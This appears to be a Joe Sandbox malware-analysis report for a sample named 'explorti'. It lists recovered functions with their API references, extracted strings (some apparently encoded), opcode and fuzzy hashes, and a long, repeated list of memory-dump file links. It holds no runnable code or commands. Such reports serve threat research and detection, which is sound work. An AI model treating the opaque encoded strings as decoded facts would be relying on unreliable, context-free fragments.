Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 1943ce54c091e3b34a4d13ef45293cf76084764ca8502138051bda1f98679029
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 01E0B672935228EBCB15DB9C894498AF2ACEB49B90F554496B505D3251C2B0DF10CBD1

Function 00292E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

stoi argument out of range, xrefs: 00294269
Dy==, xrefs: 0029369E
invalid stoi argument, xrefs: 0029425A
UFy=, xrefs: 002933BA
6JLUcxtnEx==, xrefs: 00292EC7
FAml, xrefs: 0029378F
246122658369, xrefs: 002933D4

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
API String ID: 0-3273830296
Opcode ID: aeb58a1e9a56e0e3a2bb69ae846d59d858bb03be710263c6ba6b8782d178cf1d
Instruction ID: cacf45c1afa8590b87e8a8df36e90bf48595609752853166152b330cb5a3ec57
Opcode Fuzzy Hash: aeb58a1e9a56e0e3a2bb69ae846d59d858bb03be710263c6ba6b8782d178cf1d
Instruction Fuzzy Hash: 5202BF71E20248EFEF14EFA8C849BDEBBB5BF05304F504558E805A7282D7759A94CFA1

Function 00282E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00282F1F
GetCurrentThreadId.KERNEL32 ref: 00282F3E
__Mtx_unlock.LIBCPMT ref: 00282F8C
__Cnd_broadcast.LIBCPMT ref: 00282FA3
__Mtx_unlock.LIBCPMT ref: 002830B5
GetCurrentThreadId.KERNEL32 ref: 002830F2
__Mtx_unlock.LIBCPMT ref: 0028315B

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 04c8b0ef2a42d1e266acf147dfddfb5d7506cc97390905661b7d505528c45ff1
Instruction ID: 4aad2a065c66685a43572d9e19259d4db0f7b71559d6032978573d6e2531a378
Opcode Fuzzy Hash: 04c8b0ef2a42d1e266acf147dfddfb5d7506cc97390905661b7d505528c45ff1
Instruction Fuzzy Hash: 28A104B4922316DFDF11EF64C944B5AB7B8FF15720F108129E819D7681EB31EA28CB91

Function 002B70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 002B710B

Strings

.com, xrefs: 002B714B
.exe, xrefs: 002B7118
.cmd, xrefs: 002B7129
.bat, xrefs: 002B713A

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 28e6f706a9ef0e30cab94f568858db3fad8463727a5f073afe0dbbd95bbab4df
Instruction ID: f671a26387fcb9f86c8fe839b11ba602b05636f84fa47f85194c52b38e7126f4
Opcode Fuzzy Hash: 28e6f706a9ef0e30cab94f568858db3fad8463727a5f073afe0dbbd95bbab4df
Instruction Fuzzy Hash: 6601DB37638617265719681D9C026BB17989BD3BF4B19002BFD48F73C2DE84EC2255B0

Function 00282670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00282806
___std_exception_destroy.LIBVCRUNTIME ref: 002828A0

Strings

P#(, xrefs: 002827BE, 00282899
P#(, xrefs: 00282811

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#($P#(
API String ID: 2970364248-113306838
Opcode ID: 05eb8d10a0ac0a78b5142f7eb49380a85b5371b399ede411e69de5afad3c27c4
Instruction ID: 4881b7fc5b6e5ad2e48baf01a9fb471de4a2f3617c6ca54dc27e646710d09fe6
Opcode Fuzzy Hash: 05eb8d10a0ac0a78b5142f7eb49380a85b5371b399ede411e69de5afad3c27c4
Instruction Fuzzy Hash: FF718F71E10208DBDF04DFA8C881BDDFBB5EF49310F548129E805A7285E774A954CBA5

Function 00297870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0029795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00297968
__Mtx_destroy_in_situ.LIBCPMT ref: 00297971

Strings

@y), xrefs: 0029794A

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: @y)
API String ID: 4078500453-865340929
Opcode ID: 907a79e14b384e84654b997ed3d2103fa685fcd0f1ab4a0c46755e0f51cf1fb4
Instruction ID: f3c29a579363682578ec127e2579c0ec7957d6f189704fb17afe39a29fb555d7
Opcode Fuzzy Hash: 907a79e14b384e84654b997ed3d2103fa685fcd0f1ab4a0c46755e0f51cf1fb4
Instruction Fuzzy Hash: 2231E6B29347059FEB20DF68D845B6AB7E8EF14310F500A3EE945C7241E771EA64CBA1

Function 00282AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00282B23

Strings

This function cannot be called on a default constructed task, xrefs: 00282B03
P#(, xrefs: 00282B18
P#(, xrefs: 00282B2E

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#($P#($This function cannot be called on a default constructed task
API String ID: 2659868963-67327972
Opcode ID: f9dd6cc489d4969d1cc3f3ea6e192996d8cf3919739ff23aefa60c724f6e2daa
Instruction ID: 5d8384e1b6070e1bbda5e286602ca5bd5f77f44b93deca6f93baf2e9f08bece8
Opcode Fuzzy Hash: f9dd6cc489d4969d1cc3f3ea6e192996d8cf3919739ff23aefa60c724f6e2daa
Instruction Fuzzy Hash: 62F0627092020CABCB14EFA8E84199AB7ED9F15300F5041AEF80997741EB70AE688B95

Function 002BC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 002BCA37

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a329335271ba11bc6c6d86bb666f908b8c39fa71206913750d918ee9cec402d3
Instruction ID: b37db737b018155f5bda21353a03a9f86842a4deefecc823d1bb18504b044eef
Opcode Fuzzy Hash: a329335271ba11bc6c6d86bb666f908b8c39fa71206913750d918ee9cec402d3
Instruction Fuzzy Hash: D4B115329202869FDB15CF28C881BEEBBE5EF55380F2481AAE8559B341D6749D51CB60

Function 0029BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0029BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BB14
_xtime_get.LIBCPMT ref: 0029BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BB43

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 183ae06d29619f99755f184b9a29c95dcb6a5edbf1bf579998bba77b5f34e03e
Instruction ID: 275f01bc9e9c82223da97afd17376262abf56533d5e6cc47041aac75b9fbc0c2
Opcode Fuzzy Hash: 183ae06d29619f99755f184b9a29c95dcb6a5edbf1bf579998bba77b5f34e03e
Instruction Fuzzy Hash: D4214F75E11119AFDF11EFA4DC859AEBBB8EF08714F500069F901B72A1DB70AD118FA1

Function 00297040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0029726C

Strings

`z), xrefs: 00297282
@.(, xrefs: 00297250

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.($`z)
API String ID: 3366076730-3851768029
Opcode ID: 2dbd675864fad3b4fa4c22141cbcbc5ab74344305e30fc1bc84a414decc5416a
Instruction ID: 49b9c03e0114661cd5a0202d3f6ce7fecc62804a835006f159b831e850eba6e6
Opcode Fuzzy Hash: 2dbd675864fad3b4fa4c22141cbcbc5ab74344305e30fc1bc84a414decc5416a
Instruction Fuzzy Hash: D6A126B0E216158FDF21DFA8C98479ABBF0AF48710F18819AE819AB351E7759D01CF80

Function 00298E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

P#(, xrefs: 0028246D
P#(, xrefs: 00282486

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: P#($P#(
API String ID: 0-113306838
Opcode ID: fd89e0b9573d10c568cb5481dfe10bddb78273a858621b2d86e28132b616557c
Instruction ID: be4de381782a8ffe5e7658d95d1fb32c7d74cf60b74d131edf3f9fdd8f5c6fd7
Opcode Fuzzy Hash: fd89e0b9573d10c568cb5481dfe10bddb78273a858621b2d86e28132b616557c
Instruction Fuzzy Hash: 96512972A201099BCF14DF68DC41AAEB7E9EF45350B540669F915EB341DB70EE308BD1

Function 002BF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 002BF263

Strings

`'., xrefs: 002BF235
8"., xrefs: 002BF30B

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8".$`'.
API String ID: 3903695350-1407274480
Opcode ID: 38c479c714aa2f15e6628a2a8f8149f6be1b2c7a479a68fefa024c4819ea810b
Instruction ID: 35bfdf884c9456d2403a11fc4a891fc7f47472eb98ac22cf3b334dcf79749895
Opcode Fuzzy Hash: 38c479c714aa2f15e6628a2a8f8149f6be1b2c7a479a68fefa024c4819ea810b
Instruction Fuzzy Hash: 8B31903152030A9FEB60AF39DE05BDAB7E9AF00390F54442AE956D7151DF31EC608F11

Function 00283930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00283962
__Mtx_init_in_situ.LIBCPMT ref: 002839A1

Strings

pB(, xrefs: 00283940

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB(
API String ID: 3366076730-1548366911
Opcode ID: 4e9152f84a791fecc75019f06527f528de00b4bfc284045b8916e84aad272c77
Instruction ID: b4d26af9ddf7d74010656b0caa2ecd7e3639346b09d89c8a54a82e3c8ed5db11
Opcode Fuzzy Hash: 4e9152f84a791fecc75019f06527f528de00b4bfc284045b8916e84aad272c77
Instruction Fuzzy Hash: 234123B45027068FD720DF18C588B5ABBF4FF44715F108619E86A8B781E7B5EA25CF80

Function 00282440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0028247E

Strings

P#(, xrefs: 0028246D
P#(, xrefs: 00282486

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

